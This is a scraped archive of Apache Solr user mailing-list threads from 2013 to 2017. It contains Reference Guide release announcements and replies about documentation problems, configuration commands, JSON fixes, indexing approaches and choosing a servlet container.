> https://urldefense.proofpoint.com/v2/url?u=https-3A__issues.apache.org_jira_browse_SOLR-2D11406=DwIFaQ=z0adcvxXWKG6LAMN6dVEqQ=4gLDKHTqOXldY2aQti2VNXYWPtqa1bUKE6MA9VrIJfU=iYU948dQo6G0tKFQUguY6SHOZNZoCOEAEv1sCf4ukcA=HvPPQL--s3bFtNyBdUiz1hNIqfLEVrb4Cu-HIC71dKY=
>   if i'm not mistaken?
>
> -Stefan
>
> On Sep 27, 2017 8:20 PM, "Wayne L. Johnson" 
> wrote:
>
>> I’m testing Solr 7.0.0.  When I start with an empty index, Solr comes
>> up just fine, I can add documents and query documents.  However when I
>> start with an already-populated set of documents (from 6.5.0), Solr
>> will not start.  The relevant portion of the traceback seems to be:
>>
>> Caused by: java.lang.NullPointerException
>>
>> at java.util.Objects.requireNonNull(Objects.java:203)
>>
>> …
>>
>> at java.util.stream.ReferencePipeline.reduce(
>> ReferencePipeline.java:479)
>>
>> at org.apache.solr.index.SlowCompositeReaderWrapper.(
>> SlowCompositeReaderWrapper.java:76)
>>
>> at org.apache.solr.index.SlowCompositeReaderWrapper.wrap(
>> SlowCompositeReaderWrapper.java:57)
>>
>> at org.apache.solr.search.SolrIndexSearcher.(
>> SolrIndexSearcher.java:252)
>>
>> at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:
>> 2034)
>>
>> ... 12 more
>>
>>
>>
>> In looking at the de-compiled code (SlowCompositeReaderWrapper), lines
>> 72-77, and it appears that one or more “leaf” files doesn’t have a
>> “min-version” set.  That’s a guess.  If so, does this mean Solr 7.0.0
>> can’t read a 6.5.0 index?
>>
>>
>>
>> Thanks
>>
>>
>>
>> Wayne Johnson
>>
>> 801-240-4024
>>
>> wjohnson...@ldschurch.org
>>
>> [image: familysearch2.JPG]
>>
>>
>>


Re: cwiki has problems ?

2017-08-30 Thread Cassandra Targett
The thing everyone should be aware of is that those strings you see
aren't just strange styles, they are actually lost code blocks - many
of the code examples throughout the old Ref Guide are now missing
(some, for some reason, aren't affected). IOW, if you use the old Ref
Guide, you will be missing critical information.

As Erick mentioned we're working on an automatic redirect from old to
new, but it's also in the Infra group's queue since they manage that
application.

Cassandra

On Wed, Aug 30, 2017 at 10:58 AM, Erick Erickson
 wrote:
> This has happened to several projects, so it's something
> infrastructure related not specific to Solr's CWiki. We've raised a
> ticket for infra to see fi they can find the root cause.
>
> Cassandra and Hoss are trying to address the whole
> CWiki-no-longer-current issue.
>
> BTW, I find it useful to download the PDF (upper left corner) for
> whatever version you want and search that locally. I only have 16
> separate ones on my machine ;)
>
> Best,
> Erick
>
> On Wed, Aug 30, 2017 at 8:18 AM, Susheel Kumar  wrote:
>> Now the documentation is being updated at
>>
>> http://lucene.apache.org/solr/guide/6_6/index.html
>>
>> On Wed, Aug 30, 2017 at 10:03 AM, Bernd Fehling <
>> bernd.fehl...@uni-bielefeld.de> wrote:
>>
>>> Can someone fix https://cwiki.apache.org/confluence/ ?
>>>
>>> Seams to have problems with styles?
>>>
>>> Tons of #66solid and #66nonesolid in the text.
>>> E.g. :
>>> https://cwiki.apache.org/confluence/display/solr/
>>> Getting+Started+with+SolrCloud
>>>
>>> Thanks, Bernd
>>>
>>>


Re: Solr Wiki issues

2017-08-28 Thread Cassandra Targett
This appears to have happened for at least one other Apache project
using Apache's Confluence installation:
https://issues.apache.org/jira/browse/INFRA-14971.

You should use the new Ref Guide anyway:
https://lucene.apache.org/solr/guide/post-tool.html. An automatic
redirect from the old location is in the works.

On Mon, Aug 28, 2017 at 11:32 AM, Erick Erickson
 wrote:
> Hmmm, no it's not just you, I see them too.
>
>
> On Mon, Aug 28, 2017 at 7:45 AM, Steve Pruitt  wrote:
>> Is it just me, but the Solr Wiki shows nonsensical characters for what looks 
>> like example commands, etc.?   I tried both Chrome and IE and get the same 
>> result.
>>
>> Example, on https://cwiki.apache.org/confluence/display/solr/Post+Tool
>>
>> This shows:
>>
>> Index a PDF file into gettingstarted.
>> #66nonesolid
>>
>> Automatically detect content types in a folder, and recursively scan it for 
>> documents for indexing into gettingstarted.
>> #66nonesolid
>>
>> Automatically detect content types in a folder, but limit it to PPT and HTML 
>> files and index into gettingstarted.
>> #66nonesolid
>>
>> This started showing up a few days ago.
>>
>> Thanks.
>>
>> -S


Re: in-places update solr 5.5.2

2017-07-26 Thread Cassandra Targett
The in-place update section you referenced was added in Solr 6.5. On
p. 224 of the PDF for 5.5, note it says there are only two available
approaches and the section on in-place updates you see online isn't
mentioned. I looked into the history of the online page and the
section on in-place updates was added for Solr 6.5, when SOLR-5944 was
released.

So, unfortunately, unless someone else has a better option for
pre-6.5, I believe it was not possible in 5.5.2.

Cassandra

On Wed, Jul 26, 2017 at 2:30 AM, elisabeth benoit
 wrote:
> Are in place updates available in solr 5.5.2, I find atomic updates in the
> doc
> https://archive.apache.org/dist/lucene/solr/ref-guide/apache-solr-ref-guide-5.5.pdf,
> which redirects me to the page
> https://cwiki.apache.org/confluence/display/solr/Updating+Parts+of+Documents#UpdatingPartsofDocuments-AtomicUpdates
> .
>
> On that page, for in-place updates, it says
>
> the _*version*_ field is also a non-indexed, non-stored single valued
> docValues field
>
> when I try this with solr 5.5.2 I get an error message
>
> org.apache.solr.common.SolrException:org.apache.solr.common.SolrException:
> Unable to use updateLog: _version_ field must exist in schema, using
> indexed=\"true\" or docValues=\"true\", stored=\"true\" and
> multiValued=\"false\" (_version_ is not stored
>
>
> What I'm looking for is a way to update one field of a doc without erasing
> the non stored fields. Is this possible in solr 5.5.2?
>
> best regards,
> Elisabeth


Re: uploading solr.xml to zk

2017-07-10 Thread Cassandra Targett
In your command, you are missing the "zk" part of the command. Try:

bin/solr zk cp file:local/file/path/to/solr.xml zk:/solr.xml -z localhost:2181

I see this is wrong in the documentation, I will fix it for the next
release of the Ref Guide.

I'm not sure about how to refer to it - I don't think you have to do
anything? I could be very wrong on that, though.

On Fri, Jul 7, 2017 at 2:31 PM,   wrote:
> The documentation says
>
> If you for example would like to keep your solr.xml in ZooKeeper to avoid 
> having to copy it to every node's so
> lr_home directory, you can push it to ZooKeeper with the bin/solr utility 
> (Unix example):
> bin/solr cp file:local/file/path/to/solr.xml zk:/solr.xml -z localhost:2181
>
> So Im trying to push the solr.xml my local zookeepr
>
> solr-6.4.1/bin/solr  file:/home/user1/solr/nodes/day1/solr/solr.xml 
> zk:/solr.xml -z localhost:9983
>
> ERROR: cp is not a valid command!
>
> Afterwards
> When starting up a node how do we refer to the solr.xml inside zookeeper? Any 
> examples?
>
> Thanks
> Imran
>
>
> Sent from Mail for Windows 10
>


Re: Problem in documentation -- authentication JSON fails validation

2017-06-26 Thread Cassandra Targett
I have a commit locally that I will push shortly that fixes the JSON
on that page for 7.0 (and 6.7 if/when it happens). I ran all the JSON
examples through a linter and found a few additional problems that
should be fixed now.

On Sat, Jun 24, 2017 at 1:13 PM, Chris Ulicny  wrote:
> I haven't actually tested it, but I believe the JSON should probably be
> this:
>
> {
>   "set-permission": {"name": "update", "role":"dev"},
>   "set-permission": {"name": "read", "role":"guest"}
> }
>
> It's missing closing double quotes for 'update' and 'read' and had an extra
> comma after the 'guest' entry.
>
> If I remember correctly, solr doesn't usually have any issues with
> duplicate keys that some JSON validators don't consider valid.
>
>
>
> On Sat, Jun 24, 2017 at 11:17 AM Shawn Heisey  wrote:
>
>> This problem brought to you courtesy of the IRC channel.
>>
>> On this page of the reference guide:
>>
>>
>> https://lucene.apache.org/solr/guide/6_6/rule-based-authorization-plugin.html
>>
>> There is this curl command:
>>
>> curl --user solr:SolrRocks -H 'Content-type:application/json' -d '{
>>   "set-permission": {"name": "update, "role":"dev"},
>>   "set-permission": {"name": "read, "role":"guest"},
>> }' http://localhost:8983/solr/admin/authorization
>>
>> This command doesn't work.  Solr complains about the JSON, and pasting
>> the JSON into a validator web page, I have confirmed that it fails
>> validation.
>>
>> I can't figure out how this JSON *should* be formatted, or I would just
>> fix the documentation.  Hopefully somebody knows what should go here.
>>
>> Thanks,
>> Shawn
>>
>>


Re: [Solr Ref guide 6.6] Search not working

2017-06-23 Thread Cassandra Targett
There is an open JIRA issue to provide this search:
https://issues.apache.org/jira/browse/SOLR-10299.

Yes, it's pretty ironic that docs for a search engine doesn't have a
search engine, and I agree it's absolutely necessary, but it's not
done yet.

The title keyword "search" (I hate to even call it "search" - you're
right, today "autocomplete" is a better word for it) can be expanded
relatively easily to include the body of content also. However, this
has not been tested so we have no idea how well it will perform with
the size of our content - the author of that JavaScript says it can be
bad in some situations. This could maybe be a stopgap until a full
search solution is put into place, but maybe the effort to do the
stopgap and make it work well would be better spent implementing Solr
for the Ref Guide instead.

There were 1000 details to doing this transition, and search is the
only feature from the old system that didn't make the cut before
release (and yes, it IS released - see my announcement to this list on
Tuesday). We could have held things up until someone helped make it
happen, or we could move to the new approach and get the 100 other
benefits the change provides the community right away. We chose the
latter.

I do intend to get to search at some point, hopefully sooner rather
than later. But as we say, we're all volunteers here and all of us
have other commitments - to our employers, to our families, etc. -
that sometimes take precedence. If you feel this is something that
should be worked on immediately, you (and anyone reading this) are
strongly encouraged - no, welcomed - to contribute ideas, time, and/or
code to push it forward faster.

On Fri, Jun 23, 2017 at 5:36 AM, alessandro.benedetti
 wrote:
> Hi all,
> I was just using the new Solr Ref Guide[1] (If I understood correctly this
> is going to be the next official documentation for Solr).
>
> Unfortunately search within the guide works really bad...
> The autocomplete seems to be just on page title ( including headings would
> help a lot).
> If you don't accept any suggestion, it doesn't allow to search (!!!).
> I tried on Safari and Chrome.
>
> For a Reference guide of a search engine is not nice to have the search
> feature in this status.
> Actually, being an entry point for developers and users interested in Solr,
> it should showcase an amazing and intuitive search and ease life of people
> looking for documentation.
> I may state the obvious, so concretely is anybody working to fix this ? Is
> this because it has not been released officially yet ?
>
>
> [1] https://lucene.apache.org/solr/guide/6_6/
>
>
>
> -
> ---
> Alessandro Benedetti
> Search Consultant, R Software Engineer, Director
> Sease Ltd. - www.sease.io
> --
> View this message in context: 
> http://lucene.472066.n3.nabble.com/Solr-Ref-guide-6-6-Search-not-working-tp4342508.html
> Sent from the Solr - User mailing list archive at Nabble.com.


Re: [ANNOUNCE] Apache Solr Reference Guide for 6.6 Released

2017-06-20 Thread Cassandra Targett
I wanted to add a follow-up to my announcement for the Solr 6.6
Reference Guide. This release of the Guide is the first with a new
publication process [1] and A LOT has changed.

First, we have migrated the Ref Guide completely out of Confluence
(aka CWIKI) and now follow a "docs with code" model. This means the
Ref Guide content resides in the same Git repository as the
Lucene/Solr source code. We now treat changes to documentation the
same way we treat any other code change. If you check out the
Lucene/Solr Git repository, you'll also get all of the documentation
and build scripts.

The file format for the "raw" Ref Guide content is AsciiDoc
(Asciidoctor flavor), which is a text markup syntax similar to
Markdown (but with more options than Markdown). We chose this for its
ease of editing - one of our main goals was to knock down barriers for
committers and members of the community to either make or suggest
changes to Solr's official documentation.

This change required us to develop new new tools to publish the Ref
Guide and we can now generate a HTML version that is published at the
same time as the traditional PDF artifact.

The PDF version is available the same way it always has been. The HTML
version will now be available via the Solr website for ongoing access.
If you are on Solr 6.6 for a while, you'll always be able to access
online docs for 6.6 at that URL.

As for the old Ref Guide in Confluence, it's still online for the
foreseeable future, and we are working on a redirect mechanism to
allow search engines to learn the new location. However, all comments
have been disabled and no further content edits will be made there.
(The new HTML version allows comments, though, so we have not taken
that feature away.)

This new approach allows you to contribute to the project more
directly than before. JIRA issues can be filed for any issues you may
find in the documentation, and you are welcome to submit patches if
you have the time to do so.

These changes took a long time to implement, but we hope they are
considered improvements for the entire community. If you have further
suggestions for us, please feel free to file a JIRA issue.

Cassandra

[1] I described more details of many of the changes in a blog post
about 6 weeks ago:
https://lucidworks.com/2017/05/05/reimagining-the-solr-reference-guide/.

On Tue, Jun 20, 2017 at 10:56 AM, Cassandra Targett <ctarg...@apache.org> wrote:
> The Lucene PMC is pleased to announce the release of the Solr
> Reference Guide for Solr 6.6.
>
> This 966-page PDF is the definitive guide to using Apache Solr, the
> search server built on Apache Lucene.
>
> The Guide can be downloaded from:
> https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.6.pdf
>
> It is also available online at:
> https://lucene.apache.org/solr/guide/6_6/


[ANNOUNCE] Apache Solr Reference Guide for 6.6 Released

2017-06-20 Thread Cassandra Targett
The Lucene PMC is pleased to announce the release of the Solr
Reference Guide for Solr 6.6.

This 966-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.6.pdf

It is also available online at:
https://lucene.apache.org/solr/guide/6_6/


[ANNOUNCE] Apache Solr Reference Guide for Solr 6.5 released

2017-04-05 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.5 has been released.

This 782-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The Guide can be downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.5.pdf


Apache Solr Reference Guide for Solr 6.4 released

2017-02-17 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.4 has been released.

This 763-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene. The Guide can be downloaded
from:

https://dist.apache.org/repos/dist/release/lucene/solr/ref-guide/apache-solr-ref-guide-6.4.pdf

Cassandra


Re: ClassicIndexSchemaFactory with Solr 6.3

2016-11-28 Thread Cassandra Targett
I'm not seeing how the documentation is wrong here. It says:

"When a  is not explicitly declared in a
solrconfig.xml file, Solr implicitly uses a
ManagedIndexSchemaFactory"

IOW, managed schema is the default, and you may not find a
schemaFactory definition in your file. When a schemaFactory is not
defined, it is by default ManagedIndexSchemaFactory (see also
https://issues.apache.org/jira/browse/SOLR-8131).

The page then goes on to explain how to enable
ClassicIndexSchemaFactory if you choose. Take a look at the last
section, "Changing from Managed Schema to Manually Edited schema.xml".

Cassandra

On Sat, Nov 26, 2016 at 12:11 PM, Shawn Heisey  wrote:
> On 11/26/2016 10:58 AM, Furkan KAMACI wrote:
>> I'm trying Solr 6.3. I don't want to use Managed Schema. It was OK for
>> Solr 5.x. However solrconfig.xml of Solr 6.3 doesn't have a
>> ManagedIndexSchemaFactory definition. Documentation is wrong at this
>> point (
>> https://cwiki.apache.org/confluence/display/solr/Schema+Factory+Definition+in+SolrConfig
>> ) How can I use ClassicIndexSchemaFactory with Solr 6.3?
>
> I believe that the managed schema is default now if you don't specify
> the factory to use.  I checked basic_configs in 6.2.1 and that
> definition did not appear to be present.  You'll probably have to *add*
> the schema factory definition to the config.  It looks like it's a
> top-level element, under .  It's only one line.
>
> Thanks,
> Shawn
>


Apache Solr Reference Guide for 6.3 released

2016-11-16 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.3 has been released.

This 736-page PDF is the definitive guide to using Apache Solr, the
blazing fast search server built on Apache Lucene. The Guide can be
downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.3.pdf

Cassandra


Solr Reference Guide for Solr 6.2 released

2016-09-13 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.2 has been released.

This 717-page PDF is the definitive guide to using Apache Solr, the
blazing fast search server built on Apache Lucene. It can be
downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.2.pdf

- Cassandra


Re: How to create highlight search component using Config API

2016-07-08 Thread Cassandra Targett
If you already have highlighting defined from one of the default
configsets, you can see an example of how the JSON is structured with
a Config API request. I assume you already tried that, but pointing it
out just in case.

Defining a highlighter with the Config API is a bit confusing to be
honest, but I worked out something that works:

{"add-searchcomponent": {"highlight": {"name":"myHighlight",
"class":"solr.HighlightComponent","": {"gap": {"default":"true",
"name": "gap", "class":"solr.highlight.GapFragmenter",
"defaults":{"hl.fragsize":100}}},"html":[{"default": "true","name":
"html","class": "solr.highlight.HtmlFormatter","defaults":
{"hl.simple.pre":"",
"hl.simple.post":""}},{"name": "html","class":
"solr.highlight.HtmlEncoder"}]}}}

Note there is an empty string after the initial class definition
(shown as ""). That lets you then add the fragmenters.

(I tried to prettify that, but my mail client isn't cooperating. I'm
going to add this example to the Solr Ref Guide, though so it might be
easier to see there in a few minutes.)

Hope it helps -
Cassandra

On Wed, Jun 29, 2016 at 8:00 AM, Alexandre Drouin
 wrote:
> Hi,
>
> I'm trying to create a highlight search component using the Config API of 
> Solr 6.0.1 however I cannot figure out how to include the elements 
> fragmenter, formatter, encoder, etc...
>
> Let's say I have the following component:
>
>name="myHighlightingComponent">
> 
>class="solr.highlight.GapFragmenter">
> 
>   100
> 
>   
>class="solr.highlight.HtmlFormatter">
> 
>   
>   
> 
>   
>   
> 
>   
>
> From what I can see from the documentation my JSON should look a bit like 
> this:
>
> {
>   "add-searchcomponent":{
> "name":"myHighlightingComponent",
> "class":"solr.HighlightComponent",
> ??
>   }
> }
>
> However I have no idea how to defines the 2 fragmenters or the encoder.  Any 
> help is appreciated.
>
> Thanks
> Alex
>


ANNOUNCE: Solr Reference Guide for 6.1 Released

2016-06-28 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for 6.1 has been released.

The 700 page PDF is the definitive guide to Solr. It can be downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.1.pdf


Solr Reference Guide for 6.0 Released

2016-04-25 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Apache Solr Reference
Guide for 6.0 has been released. The Guide has been updated
extensively for 6.0, with new sections for Parallel SQL and Cross Data
Center Replication.

This 660 page PDF is the definitive guide to Solr and can be
downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.0.pdf

-- Cassandra


Re: Solrcloud Batch Indexing

2016-03-08 Thread Cassandra Targett
There is an open source Hive -> Solr SerDe available that might be worth
checking out: https://github.com/lucidworks/hive-solr. I'm not sure how it
would work with the source table being rebuilt every day since it uses
Hive's external tables, but it might be something you could extend.

On Mon, Mar 7, 2016 at 4:40 PM, Erick Erickson 
wrote:

> Bin:
>
> The MRIT/Morphlines only makes sense if you have lots more
> nodes devoted to the M/R jobs than you do Solr shards since the
> actual work done to index a given doc is exactly the same either
> with MRIT/Morphlines or just sending straight to Solr.
>
> A bit of background here. I mentioned that MRIT/Morphlines uses
> EmbeddedSolrServer. This is exactly Solr as far as the actual indexing
> is concerned. So using --go-live is not buying you anything and, in fact,
> is costing you quite a bit over just using <2> to index directly to Solr
> since
> the index has to be copied around. I confess I'm surprised that --go-live
> is taking that long. basically it's just copying your index up to Solr so
> perhaps there's an I/O problem or some such.
>
> OK, I'm lying a little bit here, _if_ you have more than one replica per
> shard, then indexing straight to Solr will cost you (anecdotally)
> 10-15% in indexing speed. But if this is a single replica/shard (i.e.
> leader-only), then it's near enough to being the exact same.
>
> Anyway, at the end of the day, the index produced is self-contained.
> You could even just copy it to your shards (with Solr down), and then
> bring up your Solr nodes on a non-HDFS-based Solr.
>
> But frankly I'd avoid that and benchmark on <2> first. My expectation
> is that you'll be fine there and see indexing roughly on par with your
> MRIT/Morphlines.
>
> Now, all that said, indexing 300M docs in 'a few minutes' is a bit
> surprising.
> I'm really wondering if you're not being fooled by something "odd". Have
> you compared the identical runs with and without --go-live?
>
> _Very_ often, the bottleneck isn't Solr at all, it's the data acquisition,
> so be
> careful when measuring that the Solr CPU's are pegged... otherwise
> you're bottlenecking upstream of Solr. A super-simple way to figure that
> out is to comment out the solrServer.add(list, 1) line in <2> or just
> run MRIT/Morphlines without the --go-live switch.
>
> BTW, with <2> you could run with as many jobs as you wanted to run
> the Solr servers flat-out.
>
> FWIW,
> Erick
>
> On Mon, Mar 7, 2016 at 1:14 PM, Bin Wang  wrote:
> > Hi Eric,
> >
> > Thanks for your quick response.
> >
> > From the data's perspective, we have 300+ million rows and believe it or
> > not, the source data is from relational database (Hive) and the database
> is
> > rebuilt every day (I am as frustrated as most of you who read this but it
> > is what it is) and potentially need to store actually all of the fields.
> > In this case, I have to figure out a solution to quickly index 300+
> million
> > rows as fast as I can.
> >
> > I am still at a stage evaluating all the different solutions, and I am
> > sorry that I haven't really benchmarked the second approach yet.
> > I will find a time to run some benchmark and share the result with the
> > community.
> >
> > Regarding the approach that I suggested - mapreduce Lucene indexes, do
> you
> > think it is feasible and does that worth the effort to dive into?
> >
> > Best regards,
> >
> > Bin
> >
> >
> >
> > On Mon, Mar 7, 2016 at 1:57 PM, Erick Erickson 
> > wrote:
> >
> >> I'm wondering if you need map reduce at all ;)...
> >>
> >> The achilles heel with M/R viz: Solr is all the copying around
> >> that's done at the end of the cycle. For really large bulk indexing
> >> jobs, that's a reasonable price to pay..
> >>
> >> How many docs and how would you characterize them as far
> >> as size, fields, etc? And what are your time requirements? What
> >> kind of docs?
> >>
> >> I'm thinking this may be an "XY Problem". You're asking about
> >> a specific solution before explaining the problem.
> >>
> >> Why do you say that Solr is not really optimized for bulk loading?
> >> I took a quick look at <2> and the approach is sound. It batches
> >> up the docs in groups of 1,000 and uses CloudSolrServer as it should.
> >> Have you tried it? At the end of the day, MapReduceIndexerTool does
> >> the same work to index a doc as a regular Solr server would via
> >> EmbeddedSolrServer so if the number of tasks you have running is
> >> roughly equal to the number of shards, it _should_ be roughly
> >> comparable.
> >>
> >> Still, though, I have to repeat my question about how many docs you're
> >> talking here. Using M/R inevitably adds complexity, what are you trying
> >> to gain here that you can't get with several threads in a SolrJ client?
> >>
> >> Best,
> >> Erick
> >>
> >> On Mon, Mar 7, 2016 at 12:28 PM, Bin Wang  wrote:
> >> > Hi there,
> >> >
> >> > I have a fairly 

[ANNOUNCE] Apache Solr Ref Guide for v5.4

2015-12-15 Thread Cassandra Targett
The Lucene PMC is pleased to announce the release of the Apache Solr
Reference Guide for Solr 5.4.

This 598 page PDF is the definitive guide for Solr, written and edited by
the Solr committer community. You can download it from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

- Cassandra


Re: ctargett commented on http://people.apache.org/~ctargett/RefGuidePOC/current/Index-Replication.html

2015-09-21 Thread Cassandra Targett
Hey folks,

I'm doing some experiments with other formats for the Ref Guide and playing
around with options for comments. I didn't realize this old experiment from
https://issues.apache.org/jira/browse/SOLR-4889 would send email - I'm
talking to Steve Rowe to see if we can get that disabled.

Cassandra

On Mon, Sep 21, 2015 at 2:06 PM,  wrote:

> Hello,
> ctargett has commented on
> http://people.apache.org/~ctargett/RefGuidePOC/current/Index-Replication.html
> .
> You can find the comment here:
>
> http://people.apache.org/~ctargett/RefGuidePOC/current/Index-Replication.html#comment_4535
> Please note that if the comment contains a hyperlink, it must be
> approved
> before it is shown on the site.
>
> Below is the reply that was posted:
> 
> This is a test of the comments system.
> 
>
> With regards,
> Apache Solr Cwiki.
>
> You are receiving this email because you have subscribed to changes
> for the solrcwiki site.
> To stop receiving these emails, unsubscribe from the mailing list that
> is providing these notifications.
>
>


ANNOUNCE: Apache Solr Reference Guide for Solr 5.3 released

2015-08-25 Thread Cassandra Targett
The Lucene PMC is pleased to announce the release of the Solr Reference
Guide for Solr 5.3.

This 577 page PDF is the definitive guide for using Apache Solr and can be
downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

If you have


ANNOUNCE: Apache Solr Reference Guide for Solr 4.9 available

2014-06-30 Thread Cassandra Targett
The Lucene PMC is pleased to announce the availability of the Apache Solr
Reference Guide for Solr 4.9. The 408 page PDF is the definitive user
manual for Solr 4.9.

The Solr Reference Guide can be downloaded from the Apache mirror network:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

Cassandra


Re: ANNOUNCE: Apache Solr Reference Guide for 4.7

2014-03-05 Thread Cassandra Targett
You know, I didn't even notice that. It did go up to 30M.

I've made a note to look into that before we release the 4.8 version to see
if it can be reduced at all. I suspect the screenshots are causing it to
balloon - we made some changes to the way they appear in the PDF for 4.7
which may be the cause, but also the software was upgraded and maybe the
newer version is handling them differently.

Thanks for pointing that out.


On Tue, Mar 4, 2014 at 6:43 PM, Alexandre Rafalovitch arafa...@gmail.comwrote:

 Has it really gone up in size from 5Mb for 4.6 version to 30Mb for 4.7
 version? Or some mirrors are playing tricks (mine is:
 http://www.trieuvan.com/apache/lucene/solr/ref-guide/ )

 Regards,
Alex.
 Personal website: http://www.outerthoughts.com/
 LinkedIn: http://www.linkedin.com/in/alexandrerafalovitch
 - Time is the quality of nature that keeps events from happening all
 at once. Lately, it doesn't seem to be working.  (Anonymous  - via GTD
 book)


 On Wed, Mar 5, 2014 at 1:39 AM, Cassandra Targett ctarg...@apache.org
 wrote:
  The Lucene PMC is pleased to announce that we have a new version of the
  Solr Reference Guide available for Solr 4.7.
 
  The 395 page PDF serves as the definitive user's manual for Solr 4.7. It
  can be downloaded from the Apache mirror network:
 
  https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/
 
  Cassandra



ANNOUNCE: Apache Solr Reference Guide for 4.7

2014-03-04 Thread Cassandra Targett
The Lucene PMC is pleased to announce that we have a new version of the
Solr Reference Guide available for Solr 4.7.

The 395 page PDF serves as the definitive user's manual for Solr 4.7. It
can be downloaded from the Apache mirror network:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

Cassandra


Re: [ANNOUNCE] Apache Solr Reference Guide 4.5 Available

2013-11-19 Thread Cassandra Targett
I've often thought of possibly providing the reference guide in .epub
format, but wasn't sure of general interest. I also once tried to
convert the PDF version with calibre and it was a total mess. - but
PDF is probably the least-flexible starting point for conversion.

Unfortunately, the Word export is only available on a per-page basis,
which would make it really tedious to try to make a .doc version of
the entire guide (there are ~150 pages). There are, however, options
for HTML export, which I believe could be converted to .epub - but
might take some fiddling.

I created an issue for this - for now just to track that it's
something that might be of interest - but not sure if/when I'd
personally be able to work on it:
https://issues.apache.org/jira/browse/SOLR-5467.

On Tue, Nov 19, 2013 at 6:34 AM, Uwe Reh r...@hebis.uni-frankfurt.de wrote:
 Am 18.11.2013 14:39, schrieb Furkan KAMACI:

 Atlassian Jira has two options at default: exporting to PDF and exporting
 to Word.


 I see, 'Word' isn't optimal for a reference guide. But OO can handle 'doc'
 and has epub plugins.
 Could it be possible, to offer the doku also as 'doc(x)'

 barefaced
 Uwe



Re: difference between apache tomcat vs Jetty

2013-10-25 Thread Cassandra Targett
In terms of adding or fixing documentation, the Installing Solr page
(https://cwiki.apache.org/confluence/display/solr/Installing+Solr)
includes a yellow box that says:

Solr ships with a working Jetty server, with optimized settings for
Solr, inside the example directory. It is recommended that you use the
provided Jetty server for optimal performance. If you absolutely must
use a different servlet container then continue to the next section on
how to install Solr.

So, it's stated, but maybe not in a way that makes it clear to most
users. And maybe it needs to be repeated in another section.
Suggestions?

I did find this page,
https://cwiki.apache.org/confluence/display/solr/Running+Solr+on+Jetty,
which pretty much contradicts the previous text. I'll fix that now.

Other recommendations for where doc could be more clear are welcome.

On Thu, Oct 24, 2013 at 7:14 PM, Tim Vaillancourt t...@elementspace.com wrote:
 Hmm, thats an interesting move. I'm on the fence on that one but it surely
 simplifies some things. Good info, thanks!

 Tim


 On 24 October 2013 16:46, Anshum Gupta ans...@anshumgupta.net wrote:

 Thought you may want to have a look at this:

 https://issues.apache.org/jira/browse/SOLR-4792

 P.S: There are no timelines for 5.0 for now, but it's the future
 nevertheless.



 On Fri, Oct 25, 2013 at 3:39 AM, Tim Vaillancourt t...@elementspace.com
 wrote:

  I agree with Jonathan (and Shawn on the Jetty explanation), I think the
  docs should make this a bit more clear - I notice many people choosing
  Tomcat and then learning these details after, possibly regretting it.
 
  I'd be glad to modify the docs but I want to be careful how it is worded.
  Is it fair to go as far as saying Jetty is 100% THE recommended
 container
  for Solr, or should a recommendation be avoided, and maybe just a list of
  pros/cons?
 
  Cheers,
 
  Tim
 



 --

 Anshum Gupta
 http://www.anshumgupta.net